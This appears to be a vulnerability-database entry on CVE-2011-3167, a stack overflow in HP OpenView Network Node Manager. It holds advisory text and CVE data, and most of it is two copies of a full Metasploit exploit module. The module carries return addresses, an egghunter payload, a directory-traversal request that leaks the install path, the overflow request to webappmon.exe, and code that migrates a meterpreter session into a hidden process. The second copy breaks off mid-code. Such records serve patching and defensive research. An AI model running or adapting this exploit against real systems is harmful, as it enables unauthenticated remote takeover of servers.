Background
HP OpenView Network Node Manager (NNM) is a network monitoring solution based on SNMP.
Problem
User supplied data from the NNM web interface is passed to the OVBuildPath function in ov.dll. This function contains a stack overflow vulnerability that may allow an unauthenticated attacker to take control of the server.
Resolution
No patches are available at this time. Restrict access to the web interface of the NNM server.
Limitations
This exploit has been tested against HP OpenView Network Node Manager 7.53 on Windows Server 2003 SP2 English (DEP OptOut) with KB956802 and KB2393802.
Platforms
Windows
{"id": "SAINT:AB5617474F7BE9B629ADCCF2D88D5092", "bulletinFamily": "exploit", "title": "HP OpenView Network Node Manager OVBuildPath Overflow", "description": "Added: 02/20/2012 \nCVE: [CVE-2011-3167](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3167>) \nBID: [50471](<http://www.securityfocus.com/bid/50471>) \nOSVDB: [76775](<http://www.osvdb.org/76775>) \n\n\n### Background\n\nHP OpenView Network Node Manager (NNM) is a network monitoring solution based on SNMP. \n\n### Problem\n\nUser supplied data from the NNM web interface is passed to the OVBuildPath function in ov.dll. This function contains a stack overflow vulnerability that may allow an unauthenticated attacker to take control of the server. \n\n### Resolution\n\nNo patches are available at this time. Restrict access to the web interface of the NNM server. \n\n### References\n\n<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03054052> \n<http://www.zerodayinitiative.com/advisories/ZDI-12-002/> \n<http://www.zerodayinitiative.com/advisories/ZDI-12-003/> \n\n\n### Limitations\n\nThis exploit has been tested against HP OpenView Network Node Manager 7.53 on Windows Server 2003 SP2 English (DEP OptOut) with KB956802 and KB2393802. 
\n\n### Platforms\n\nWindows \n \n\n", "published": "2012-02-20T00:00:00", "modified": "2012-02-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_ovbuildpath", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2011-3167"], "type": "saint", "lastseen": "2019-06-04T23:19:36", "edition": 4, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3167"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108874"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27279", "SECURITYVULNS:VULN:12023", "SECURITYVULNS:DOC:27517"]}, {"type": "saint", "idList": ["SAINT:9AD3CB68986F0A2E9C3BCB4A4E9FB1A5", "SAINT:1B3DC2DC93CA32D821F922E364385055"]}, {"type": "exploitdb", "idList": ["EDB-ID:18388"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_OVBUILDPATH_TEXTFILE"]}, {"type": "zdi", "idList": ["ZDI-12-002"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103364"]}, {"type": "nessus", "idList": ["HP_NNM_MULTIPLE_CODE_EXECUTION.NASL"]}], "modified": "2019-06-04T23:19:36", "rev": 2}, "score": {"value": 9.1, "vector": "NONE", "modified": "2019-06-04T23:19:36", "rev": 2}, "vulnersScore": 9.1}, "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:51:05", "description": "Unspecified vulnerability in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1210.", "edition": 4, "cvss3": {}, "published": "2011-11-02T17:55:00", "title": "CVE-2011-3167", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3167"], "modified": "2012-02-15T04:09:00", "cpe": ["cpe:/a:hp:openview_network_node_manager:7.51", "cpe:/a:hp:openview_network_node_manager:7.53"], "id": "CVE-2011-3167", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3167", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_network_node_manager:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2019-05-29T19:19:29", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3167"], "edition": 2, "description": "Added: 02/20/2012 \nCVE: [CVE-2011-3167](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3167>) \nBID: [50471](<http://www.securityfocus.com/bid/50471>) \nOSVDB: [76775](<http://www.osvdb.org/76775>) \n\n\n### Background\n\nHP OpenView Network Node Manager (NNM) is a network monitoring solution based on SNMP. \n\n### Problem\n\nUser supplied data from the NNM web interface is passed to the OVBuildPath function in ov.dll. 
This function contains a stack overflow vulnerability that may allow an unauthenticated attacker to take control of the server. \n\n### Resolution\n\nNo patches are available at this time. Restrict access to the web interface of the NNM server. \n\n### References\n\n<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03054052> \n<http://www.zerodayinitiative.com/advisories/ZDI-12-002/> \n<http://www.zerodayinitiative.com/advisories/ZDI-12-003/> \n\n\n### Limitations\n\nThis exploit has been tested against HP OpenView Network Node Manager 7.53 on Windows Server 2003 SP2 English (DEP OptOut) with KB956802 and KB2393802. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-02-20T00:00:00", "published": "2012-02-20T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_ovbuildpath", "id": "SAINT:1B3DC2DC93CA32D821F922E364385055", "type": "saint", "title": "HP OpenView Network Node Manager OVBuildPath Overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3167"], "description": "Added: 02/20/2012 \nCVE: [CVE-2011-3167](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3167>) \nBID: [50471](<http://www.securityfocus.com/bid/50471>) \nOSVDB: [76775](<http://www.osvdb.org/76775>) \n\n\n### Background\n\nHP OpenView Network Node Manager (NNM) is a network monitoring solution based on SNMP. \n\n### Problem\n\nUser supplied data from the NNM web interface is passed to the OVBuildPath function in ov.dll. This function contains a stack overflow vulnerability that may allow an unauthenticated attacker to take control of the server. \n\n### Resolution\n\nNo patches are available at this time. Restrict access to the web interface of the NNM server. 
\n\n### References\n\n<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03054052> \n<http://www.zerodayinitiative.com/advisories/ZDI-12-002/> \n<http://www.zerodayinitiative.com/advisories/ZDI-12-003/> \n\n\n### Limitations\n\nThis exploit has been tested against HP OpenView Network Node Manager 7.53 on Windows Server 2003 SP2 English (DEP OptOut) with KB956802 and KB2393802. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2012-02-20T00:00:00", "published": "2012-02-20T00:00:00", "id": "SAINT:9AD3CB68986F0A2E9C3BCB4A4E9FB1A5", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_ovbuildpath", "type": "saint", "title": "HP OpenView Network Node Manager OVBuildPath Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T09:38:39", "description": "HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow. CVE-2011-3167. Remote exploit for windows platform", "published": "2012-01-20T00:00:00", "type": "exploitdb", "title": "HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3167"], "modified": "2012-01-20T00:00:00", "id": "EDB-ID:18388", "href": "https://www.exploit-db.com/exploits/18388/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Remote::Egghunter\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node\r\n\t\t\t\tManager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long\r\n\t\t\t\t'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can\r\n\t\t\t\tcause a stack-based buffer overflow and execute arbitrary code.\r\n\r\n\t\t\t\tThe vulnerable code is within the \"_OVBuildPath\" function within \"ov.dll\". There\r\n\t\t\t\tare no stack cookies, so exploitation is achieved by overwriting the saved return\r\n\t\t\t\taddress.\r\n\r\n\t\t\t\tThe vulnerability is due to the use of the function \"_OVConcatPath\" which finally\r\n\t\t\t\tuses \"strcat\" in a insecure way. User controlled data is concatenated to a string\r\n\t\t\t\twhich contains the OpenView installation path.\r\n\r\n\t\t\t\tTo achieve reliable exploitation a directory traversal in OpenView5.exe\r\n\t\t\t\t(OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation\r\n\t\t\t\tpath. 
If the installation path cannot be guessed the default installation path\r\n\t\t\t\tis used.\r\n\t\t\t} ,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery\r\n\t\t\t\t\t'juan vazquez', # Metasploit module\r\n\t\t\t\t\t'sinn3r' # Metasploit fu\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-3167' ],\r\n\t\t\t\t\t[ 'OSVDB', '76775' ],\r\n\t\t\t\t\t[ 'BID', '50471' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-002/' ],\r\n\t\t\t\t\t[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload'\t =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 950,\r\n\t\t\t\t\t'BadChars' => [*(0x00..0x09)].pack(\"C*\") + [*(0x0b..0x23)].pack(\"C*\") + [0x26, 0x2b, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f].pack(\"C*\"),\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'EncoderOptions' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'BufferRegister' => 'EDI' # Egghunter jmp edi\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets'\t =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3',\r\n\t\t\t\t\t\t# Patches installed:\r\n\t\t\t\t\t\t# * ECS_00048\r\n\t\t\t\t\t\t# * NNM_01128\r\n\t\t\t\t\t\t# * NNM_01172\r\n\t\t\t\t\t\t# * NNM_01187\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 1067,\r\n\t\t\t\t\t\t\t'Ret' => 0x5a41656a, # pop/pop/ret - in ov.dll (v1.30.5.8002)\r\n\t\t\t\t\t\t\t'JmpESP' => 0x5a4251c5, # call esp - in ov.dll\r\n\t\t\t\t\t\t\t'EggAdjust' => 4,\r\n\t\t\t\t\t\t\t'ReadableAddress' => 0x5a466930 # ov.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Nov 01 2011'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(80),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\t# The following code allows to migrate if having 
into account\r\n\t# that over Windows XP permissions aren't granted on %windir%\\system32\r\n\t#\r\n\t# Code ripped from \"modules/post/windows/manage/migrate.rb\". See it\r\n\t# for more information\r\n\tdef on_new_session(client)\r\n\r\n\t\tif client.type != \"meterpreter\"\r\n\t\t\tprint_error(\"NOTE: you must use a meterpreter payload in order to process migration.\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tclient.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")\r\n\r\n\t\t# Select path and executable to run depending the architecture\r\n\t\t# and the operating system\r\n\t\tif client.sys.config.sysinfo[\"OS\"] =~ /Windows XP/\r\n\t\t\twindir = client.fs.file.expand_path(\"%ProgramFiles%\")\r\n\t\t\tcmd=\"#{windir}\\\\Windows NT\\\\Accessories\\\\wordpad.exe\"\r\n\t\telse # Windows 2000\r\n\t\t\twindir = client.fs.file.expand_path(\"%windir%\")\r\n\t\t\tif client.sys.config.sysinfo['Architecture'] =~ /x86/\r\n\t\t\t\tcmd = \"#{windir}\\\\System32\\\\notepad.exe\"\r\n\t\t\telse\r\n\t\t\t\tcmd = \"#{windir}\\\\Sysnative\\\\notepad.exe\"\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# run hidden\r\n\t\tprint_status(\"Spawning #{cmd.split(\"\\\\\").last} process to migrate to\")\r\n\t\tproc = client.sys.process.execute(cmd, nil, {'Hidden' => true })\r\n\t\ttarget_pid = proc.pid\r\n\r\n\t\tbegin\r\n\t\t\tprint_good(\"Migrating to #{target_pid}\")\r\n\t\t\tclient.core.migrate(target_pid)\r\n\t\t\tprint_good(\"Successfully migrated to process #{target_pid}\")\r\n\t\trescue ::Exception => e\r\n\t\t\tprint_error(\"Could not migrate in to process.\")\r\n\t\t\tprint_error(e.to_s)\r\n\t\tend\r\n\r\n\tend\r\n\r\n\t# Tries to guess the HP OpenView install dir via the Directory traversal identified\r\n\t# by OSVDB 44359.\r\n\t# If OSVDB 44359 doesn't allow to retrieve the installation path the default one\r\n\t# (C:\\Program Files\\HP OpenView\\) is used.\r\n\t# Directory Traversal used:\r\n\t# 
http://host/OvCgi/OpenView5.exe?Context=Snmp&Action=../../../log/setup.log\r\n\tdef get_install_path\r\n\r\n\t\tcgi = '/OvCgi/OpenView5.exe'\r\n\t\tweb_session = rand_text_numeric(3)\r\n\t\tmy_cookie = \"OvOSLocale=English_United States.1252; \"\r\n\t\tmy_cookie << \"OvAcceptLang=en-US; \"\r\n\t\tmy_cookie << \"OvJavaLocale=en_US.Cp1252; \"\r\n\t\tmy_cookie << \"OvWebSession=#{web_session}:AnyUser:\"\r\n\r\n\t\tpayload = \"../../../log/setup.log\"\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri'\t\t => cgi,\r\n\t\t\t'cookie' => my_cookie,\r\n\t\t\t'method'\t => \"GET\",\r\n\t\t\t'vars_get' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Target' => \"Main\",\r\n\t\t\t\t\t'Scope' => \"Snmp\",\r\n\t\t\t\t\t'Action' => payload\r\n\t\t\t\t}\r\n\t\t}, 5)\r\n\r\n\t\tinstallation_path = \"\"\r\n\t\tif res and res.code == 200 and\r\n\t\t\t\tres.body =~ /([A-Z]:\\\\.*\\\\)log/\r\n\t\t\tprint_status(\"Installation Path Found in #{$1}\")\r\n\t\t\tinstallation_path = $1\r\n\t\telse\r\n\t\t\tprint_status(\"Installation Path Not Found using the default\")\r\n\t\t\tinstallation_path = \"C:\\\\Program Files\\\\HP OpenView\\\\\"\r\n\t\tend\r\n\r\n\t\treturn installation_path\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tinstall_path = get_install_path\r\n\t\tinstall_path << \"help\\\\English_United States.1252\"\r\n\r\n\t\teggoptions = {\r\n\t\t\t:checksum => true,\r\n\t\t}\r\n\t\thunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)\r\n\r\n\t\t[ 'x86/alpha_mixed'].each { |name|\r\n\t\t\tenc = framework.encoders.create(name)\r\n\t\t\tif name =~/alpha/\r\n\t\t\t\t# If control is transferred to the decoder via \"call esp\" BufferOfset\r\n\t\t\t\t# shoulds be adjusted.\r\n\t\t\t\tif target[\"EggAdjust\"] and target[\"EggAdjust\"] > 0\r\n\t\t\t\t\tenc_options = {\r\n\t\t\t\t\t\t'BufferRegister' => 'ESP',\r\n\t\t\t\t\t\t'BufferOffset' => 
target[\"EggAdjust\"]\r\n\t\t\t\t\t}\r\n\t\t\t\t\tenc.datastore.import_options_from_hash(enc_options)\r\n\t\t\t\telse\r\n\t\t\t\t\tenc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\t\thunter = enc.encode(hunter, nil, nil, platform)\r\n\t\t}\r\n\r\n\t\toffset = target['Offset'] - install_path.length - egg.length\r\n\r\n\t\tmy_payload = egg\r\n\t\tmy_payload << rand_text_alphanumeric(offset)\r\n\t\tmy_payload << [target.ret].pack(\"V\")\r\n\t\tmy_payload << rand_text_alphanumeric(4) # Padding\r\n\t\tmy_payload << [target[\"ReadableAddress\"]].pack(\"V\")\r\n\t\tmy_payload << [target[\"JmpESP\"]].pack(\"V\")\r\n\t\tmy_payload << hunter\r\n\r\n\t\tbuf = \"-textFile+#{my_payload}+++++++++++++++++++++++\"\r\n\t\tbuf << \"-appendSelectList+-appendSelectListToTitle+%09%09++++++\"\r\n\t\tbuf << \"-commandHeading+%22Protocol+++++++++Port++++++++Service%22+++++++++++++++++++++++\"\r\n\t\tbuf << \"-dataLine+2+\"\r\n\t\tbuf << \"-commandTitle+%22Services%22+%09%09++++++\"\r\n\t\tbuf << \"-iconName+%22Services%22+++++++++++++++++++++++\"\r\n\t\tbuf << \"-cmd+rnetstat+\"\r\n\t\tbuf << \"-S\"\r\n\r\n\t\tweb_session = rand_text_numeric(3)\r\n\t\tmy_cookie = \"OvOSLocale=English_United States.1252; \"\r\n\t\tmy_cookie << \"OvAcceptLang=en-US; \"\r\n\t\tmy_cookie << \"OvJavaLocale=en_US.Cp1252; \"\r\n\t\tmy_cookie << \"OvWebSession=#{web_session}:AnyUser:\"\r\n\r\n\t\tcgi = '/OvCgi/webappmon.exe'\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => cgi,\r\n\t\t\t'cookie' => my_cookie,\r\n\t\t\t'method' => \"POST\",\r\n\t\t\t'vars_post' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ins' => 'nowait',\r\n\t\t\t\t\t'sel' => rand_text_alphanumeric(15),\r\n\t\t\t\t\t'app' => 'IP Tables',\r\n\t\t\t\t\t'act' => 'Services',\r\n\t\t\t\t\t'help' => '',\r\n\t\t\t\t\t'cache' => rand_text_numeric(4)\r\n\t\t\t\t},\r\n\t\t\t'data' => \"arg=#{buf}\" # Avoid uri encoding\r\n\t\t}, 3)\r\n\r\n\t\tif res and res.code != 502\r\n\t\t\tprint_error(\"Eek! 
We weren't expecting a response, but we got one\")\r\n\t\t\tif datastore['DEBUG']\r\n\t\t\t\tprint_line()\r\n\t\t\t\tprint_error(res.inspect)\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n\r\n=begin\r\n\r\n* migrate to %windir%/system32/notepad.exe fails on Windows XP SP3\r\n\r\nmeterpreter > run post/windows/manage/migrate\r\n\r\n[*] Running module against HOME-F006222D6C\r\n[*] Current server process: webappmon.exe (7064)\r\n[*] Spawning notepad.exe process to migrate to\r\n[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.\r\n[-] Call stack:\r\n[-] /projects/exploiting/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'\r\n[-] (eval):80:in `create_temp_proc'\r\n[-] (eval):49:in `run'\r\n=end", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18388/"}], "zdi": [{"lastseen": "2020-06-22T11:40:55", "bulletinFamily": "info", "cvelist": ["CVE-2011-3167"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of OpenView Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within ov.dll. When processing a user supplied file name for the textFile option, there exists an insufficient boundary check before supplying the value to a format string within _OVBuildPath, causing a stack overflow. 
This can lead to memory corruption which can be leveraged to execute arbitrary code under the context of the target service.", "modified": "2012-06-22T00:00:00", "published": "2012-01-05T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-002/", "id": "ZDI-12-002", "title": "HP OpenView NNM ov.dll _OVBuildPath Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-13T00:54:20", "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the \"_OVBuildPath\" function within \"ov.dll\". There are no stack cookies, so exploitation is achieved by overwriting the saved return address. The vulnerability is due to the use of the function \"_OVConcatPath\" which finally uses \"strcat\" in an insecure way. User controlled data is concatenated to a string which contains the OpenView installation path. To achieve reliable exploitation a directory traversal in OpenView5.exe (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation path. 
If the installation path cannot be guessed the default installation path is used.\n", "published": "2012-01-18T18:05:18", "type": "metasploit", "title": "HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3167"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_OVBUILDPATH_TEXTFILE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Egghunter\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP OpenView Network Node\n Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long\n 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n The vulnerable code is within the \"_OVBuildPath\" function within \"ov.dll\". There\n are no stack cookies, so exploitation is achieved by overwriting the saved return\n address.\n\n The vulnerability is due to the use of the function \"_OVConcatPath\" which finally\n uses \"strcat\" in an insecure way. User controlled data is concatenated to a string\n which contains the OpenView installation path.\n\n To achieve reliable exploitation a directory traversal in OpenView5.exe\n (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation\n path. 
If the installation path cannot be guessed the default installation path\n is used.\n } ,\n 'Author' =>\n [\n 'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery\n 'juan vazquez', # Metasploit module\n 'sinn3r' # Metasploit fu\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-3167' ],\n [ 'OSVDB', '76775' ],\n [ 'BID', '50471' ],\n [ 'ZDI', '12-002' ],\n [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052' ]\n ],\n 'Payload'\t =>\n {\n 'Space' => 950,\n 'BadChars' => [*(0x00..0x09)].pack(\"C*\") + [*(0x0b..0x23)].pack(\"C*\") + [0x26, 0x2b, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f].pack(\"C*\"),\n 'DisableNops' => true,\n 'EncoderOptions' =>\n {\n 'BufferRegister' => 'EDI' # Egghunter jmp edi\n }\n },\n 'Platform' => 'win',\n 'Targets'\t =>\n [\n [ 'HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3',\n # Patches installed:\n # * ECS_00048\n # * NNM_01128\n # * NNM_01172\n # * NNM_01187\n {\n 'Offset' => 1067,\n 'Ret' => 0x5a41656a, # pop/pop/ret - in ov.dll (v1.30.5.8002)\n 'JmpESP' => 0x5a4251c5, # call esp - in ov.dll\n 'EggAdjust' => 4,\n 'ReadableAddress' => 0x5a466930 # ov.dll\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2011-11-01'))\n\n self.needs_cleanup = true\n end\n\n # The following code allows to migrate if having into account\n # that over Windows XP permissions aren't granted on %windir%\\system32\n #\n # Code ripped from \"modules/post/windows/manage/migrate.rb\". 
See it\n # for more information\n def on_new_session(client)\n\n if client.type != \"meterpreter\"\n print_error(\"NOTE: you must use a meterpreter payload in order to process migration.\")\n return\n end\n\n client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")\n\n # Use the system path for executable to run except the wordpad\n if client.sys.config.sysinfo[\"OS\"] =~ /Windows XP/\n windir = client.sys.config.getenv('ProgramFiles')\n cmd=\"#{windir}\\\\Windows NT\\\\Accessories\\\\wordpad.exe\"\n else # Windows 2000\n cmd = \"notepad.exe\"\n end\n\n # run hidden\n print_status(\"Spawning #{cmd.split(\"\\\\\").last} process to migrate to\")\n proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })\n target_pid = proc.pid\n\n begin\n print_good(\"Migrating to #{target_pid}\")\n client.core.migrate(target_pid)\n print_good(\"Successfully migrated to process #{target_pid}\")\n rescue ::Exception => e\n print_error(\"Could not migrate in to process.\")\n print_error(e.to_s)\n end\n\n end\n\n # Tries to guess the HP OpenView install dir via the Directory traversal identified\n # by OSVDB 44359.\n # If OSVDB 44359 doesn't allow to retrieve the installation path the default one\n # (C:\\Program Files\\HP OpenView\\) is used.\n # Directory Traversal used:\n # http://host/OvCgi/OpenView5.exe?Context=Snmp&Action=../../../log/setup.log\n def get_install_path\n\n cgi = '/OvCgi/OpenView5.exe'\n web_session = rand_text_numeric(3)\n my_cookie = \"OvOSLocale=English_United States.1252; \"\n my_cookie << \"OvAcceptLang=en-US; \"\n my_cookie << \"OvJavaLocale=en_US.Cp1252; \"\n my_cookie << \"OvWebSession=#{web_session}:AnyUser:\"\n\n payload = \"../../../log/setup.log\"\n res = send_request_cgi({\n 'uri'\t\t => cgi,\n 'cookie' => my_cookie,\n 'method'\t => \"GET\",\n 'vars_get' =>\n {\n 'Target' => \"Main\",\n 'Scope' => \"Snmp\",\n 'Action' => payload\n }\n }, 5)\n\n installation_path = \"\"\n if res and res.code == 200 and\n res.body =~ 
/([A-Z]:\\\\.*\\\\)log/\n print_status(\"Installation Path Found in #{$1}\")\n installation_path = $1\n else\n print_status(\"Installation Path Not Found using the default\")\n installation_path = \"C:\\\\Program Files\\\\HP OpenView\\\\\"\n end\n\n return installation_path\n end\n\n def exploit\n print_status(\"Trying target #{target.name}...\")\n\n install_path = get_install_path\n install_path << \"help\\\\English_United States.1252\"\n\n eggoptions = {\n :checksum => true,\n }\n hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)\n\n [ 'x86/alpha_mixed'].each { |name|\n enc = framework.encoders.create(name)\n if name =~/alpha/\n # If control is transferred to the decoder via \"call esp\" BufferOfset\n # shoulds be adjusted.\n if target[\"EggAdjust\"] and target[\"EggAdjust\"] > 0\n enc_options = {\n 'BufferRegister' => 'ESP',\n 'BufferOffset' => target[\"EggAdjust\"]\n }\n enc.datastore.import_options_from_hash(enc_options)\n else\n enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })\n end\n end\n hunter = enc.encode(hunter, nil, nil, platform)\n }\n\n offset = target['Offset'] - install_path.length - egg.length\n\n my_payload = egg\n my_payload << rand_text_alphanumeric(offset)\n my_payload << [target.ret].pack(\"V\")\n my_payload << rand_text_alphanumeric(4) # Padding\n my_payload << [target[\"ReadableAddress\"]].pack(\"V\")\n my_payload << [target[\"JmpESP\"]].pack(\"V\")\n my_payload << hunter\n\n buf = \"-textFile+#{my_payload}+++++++++++++++++++++++\"\n buf << \"-appendSelectList+-appendSelectListToTitle+%09%09++++++\"\n buf << \"-commandHeading+%22Protocol+++++++++Port++++++++Service%22+++++++++++++++++++++++\"\n buf << \"-dataLine+2+\"\n buf << \"-commandTitle+%22Services%22+%09%09++++++\"\n buf << \"-iconName+%22Services%22+++++++++++++++++++++++\"\n buf << \"-cmd+rnetstat+\"\n buf << \"-S\"\n\n web_session = 